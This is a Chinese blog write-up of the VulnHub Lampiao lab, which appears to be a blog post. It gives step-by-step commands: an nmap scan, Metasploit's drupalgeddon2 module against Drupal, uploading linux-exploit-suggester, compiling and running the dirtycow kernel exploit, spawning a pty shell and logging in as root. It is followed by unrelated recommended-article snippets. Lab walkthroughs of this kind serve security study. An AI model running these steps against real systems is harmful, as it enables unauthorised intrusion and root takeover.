➢ Web到Linux-内核溢出Dcow

于 2024-08-29 17:10:49 发布
阅读量176 收藏 3
点赞数 5
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_85783544/article/details/141681190
版权

复现环境:https://www.vulnhub.com/entry/lampiao-1,249/

解压Lampiao.zip导⼊虚拟机

步骤一:信息收集

1. 探测⽬标ip及开发端⼝ # nmap -p1-65535 192.168.150.0/24
2.发现192.168.150.128的同时该ip也开启了1898端口

步骤二:web漏洞利用

1.该⽹址是Drupal编写,所以我们进⼊msf进⾏查找是否有漏洞利⽤模块
找到 use exploit/unix/webapp/drupal_drupalgeddon2
2.进⾏漏洞利⽤

set rhost 192.168.220.158

set rport 1898

run

可以看到已经获取到主机权限

步骤三:内核提权

1.上传内核漏洞检测脚本 upload /root/linux-exploit-suggester.sh /tmp/1.sh
2.进⼊shell,并执⾏提权辅助脚本

shell

cd /tmp

chmod +x 1.sh

./1.sh

下面红框是漏洞利用程序

3.发现提权漏洞,上传提权利⽤程序dcow.cpp到服务器

exit upload /root/dcow.cpp /tmp/dcow.cpp

4. 进⾏提权操作

shell cd /tmp

5..编译漏洞利⽤程序成功后会在当前⽬录⽣成dcow

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

ls

6.由于本身的终端问题,所以使⽤python终端

python -c 'import pty; pty.spawn("/bin/bash")'

7.运行编译后的文件

./dcow

8.漏洞利⽤成功后使⽤root⽤户密码

dirtyCowFun

9.进⾏登录即可

su root

10.查看当前权限whoami

詹姆诗
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux升级内核的解决方案
weixin_43178406的博客
07-20 3341
本文主要介绍了linux升级内核的解决方案,希望能对学习linux的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
Linux--内核版本和发行版本
GodGreat199383的博客
03-02 6156
一、区别 linux核心只有内核部分,安装完后,用户界面/软件都没有。内核是系统的心脏,是linux中最基层的代码。 linux发行版,就是在内核的基础上,加入用户界面,各种软件的支持。比如CenterOS、小红帽等等。在内核的基础上,开发不同应用程序,组成的一个完整的操作系统。 二、Linux发行版 1、Linux发行版(Linux distribution) 是一种为一般用户预先集成好的Linux操作系统及各种应用软件。一般不需要用户重新编译,在直接安装之后,只需要作出小幅度的更改设置即可。
Linux系统升级及内核版本升级
热门推荐
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
09-23 3万+
一、背景 工作中有时会遇到系统版本过旧,无法满足安全扫描后的安全要求,系统漏洞数量多,处理难度较大,这时,我们就需要升级OS或Linux内核版本; 二、升级操作 2.1、 redhat/CentOS系统 三、附录:包升级命令 1)配置yum更新源 /etc/yum.repos.d目录下新建主机的yum源,.repos文件中,repositoryid:指定一个仓库,name指定仓库名称, baseurl:指定仓库的URL,mirrorlist指定仓库的镜像站点,enable是否启用本仓库,gpgcheck
Linux如何查看内核版本并安装内核头文件linux-headers-generic
tanmx219的博客
03-15 2万+
linux内核的头文件一般是这样的格式:linux-headers-5.13.0-01-generic,当然根据你的查询方式不同,写法各异。 一般的检查指令 下面我列举一些快速查询linux内核版本信息的指令 ~$ uname -srmLinux 5.13.0-35-generic x86_64 ~$ uname -r5.13.0-35-generic ~$ echo linux-headers-$(uname -r)linux-headers-5.13.0-35-generic ~$ h.
Linux-内核-学习笔记(11):内核配置和编译原理
qq_42826337的博客
04-03 5682
Linux-内核-学习笔记(11):内核配置和编译原理 一、内核简介 1. 操作系统 1.1、什么是操作系统? 操作系统本质上是一个程序,由很多个源文件构成,需要编译连接成操作系统程序。它主要作用就是管理计算机硬件,给应用程序提供一个运行环境。例如linux、windows、android、ucos就是操作系统。 1.2、操作系统核心功能 操作系统就相当于你的一个管家,是一些功能的综合体,他会管理...
make-kpkg命令--linux内核头文件生成过程并填坑
u013431396的博客
10-04 3475
前言 编译Linux驱动,内核头文件是必不可少的,这里根据开发经验,介绍生成linux headers的过程. 操作步骤( 在root帐号,以ARM64平台为例): 1. 解压内核源码 2. 执行make my_defconfig 生成.config,这里我把交叉编译工具配置好了,也就是CONFIG_CROSS_COMPILE,同时CONFIG_ARM64=y 3.执行make -j32 编译内核 4.执行make-kpkg --initrd --cross-compile aarch6..
arm-linux---编译内核时,出现“make: arm-linux-gnueabihf-gcc: 命令未找到”的情况
sunny_hu92的博客
06-03 1万+
有时候,我们在Ubuntu 上编译arm Linux内核时,会出现”make: arm-linux-gnueabihf-gcc:命令未找到“的问题,即系统未找到交叉编译工具的情况,此时可以按照以下步骤进行检查。 1. 检查
菜鸟笔记--linux内核配置iptables
中华田园巨龙
08-05 3813
补充下之前排查docker安装时,iptables缺失的问题,下面介绍下iptables的内核配置 首先切换到内核源码目录,执行 make menuconfig 1、第一步,选中Networking support (按Y) 2、回车进入Networking support ,再进入Networking options 3、选中下面的选项(按Y) 4、按回车进入到core Netfilter configuration ,里面的所有选项全选(按Y) 5、进入到IP:Netfilter Config
linux uname详解 -s -r -a 查看内核版本
global_coding的博客
10-18 5983
linux uname详解 -s -r -a 查看内核版本
Linux升级内核以及删除Linux多余的内核
a932432866的专栏
06-02 6490
Linux升级内核以及删除Linux多余的内核 很多童鞋在玩耍linux发行版的时候,都会遇到各种各样的问题,比如:网卡不能使用,亮度不能调节,触摸板不能识别,蓝牙不能使用等等,这些关系都和linux内核有关系。 什么是linux内核Linux内核(英语:Linux kernel),是一种开源的类Unix操作系统宏内核Linux内核最早是于1991年由芬兰黑客林纳斯·托瓦兹为自己...
linux2.6.1内核源码注释
03-10
Linux 2.6.11.12内核源码注释是一份极其珍贵的资料,它涵盖了Linux内核的多个关键组件,包括同步机制、信号处理、内存管理、进程调度、文件系统以及网络系统。这些是Linux内核运行的核心组成部分,对于理解Linux操作...
Linux-0.11源码(同济大学中文注释版)
07-03
Linux-0.11中文注释版;配套《linux内核完全剖析(0.11版本内核)》;linux第一个稳定版本,linus发布的,包含全部linux的基本设计,只有2万行代码,但是五脏俱全,比动辄几百万的linux版本更易于理解和整体把握
arm-linux-gcc-4.5.1-v6-vfp-20101103
10-13
用户在解压后,可以将“opt”目录设置到环境变量PATH中,以便于命令行调用arm-linux-gcc编译器和其他相关工具。 总结一下,"arm-linux-gcc-4.5.1-v6-vfp-20101103"是友善之臂公司为ARM11处理器提供的一个交叉编译...
linux 内核溢出,Linux 内核溢出分析
weixin_39714528的博客
04-30 1228
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?由于内核栈的大小是有限的,就会有发生溢出的可能,比如调用嵌套太多、参数太多都会导致内核栈的使用超出设定的大小。本文分析内核溢出Linux 系统进程运行分为 用户态 和 内核态,进入内核态之后使用的是内核栈,作为基本的安全机制,用户程序不能直接访问内核栈,所以尽管内核栈属于进程的地址空间,但与用户栈是分开的。内核栈需要...
Linux 线程的控制 互斥与同步
qq_63145217的博客
08-23 1464
include //头文件sem_t sem;信号量的类型 信号量的变量。
虚拟内存和linux(操作系统八股文part1)
linjixia的博客
08-24 1198
八股之虚拟内存和Linux部分的笔记。
Linux中杀死占用某个端口的进程
最新发布
靖妖傩舞
08-28 336
选项表示强制终止进程,但这种方式可能会导致数据丢失或其他不良后果,所以在使用时要谨慎。确定要杀死的进程 PID。从上述步骤中获取到占用端口 9997 的进程 PID。
Linuxctags——R的使用
m0_71703182的博客
08-23 716
按下。
Linux 进程 | 进程优先级&进程的环境变量
TTKunn的博客
08-23 1585
本文主要内容为进程的优先级和进程的环境变量,其中含有查看进程、优先级概念、环境变量概念等详细内容
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值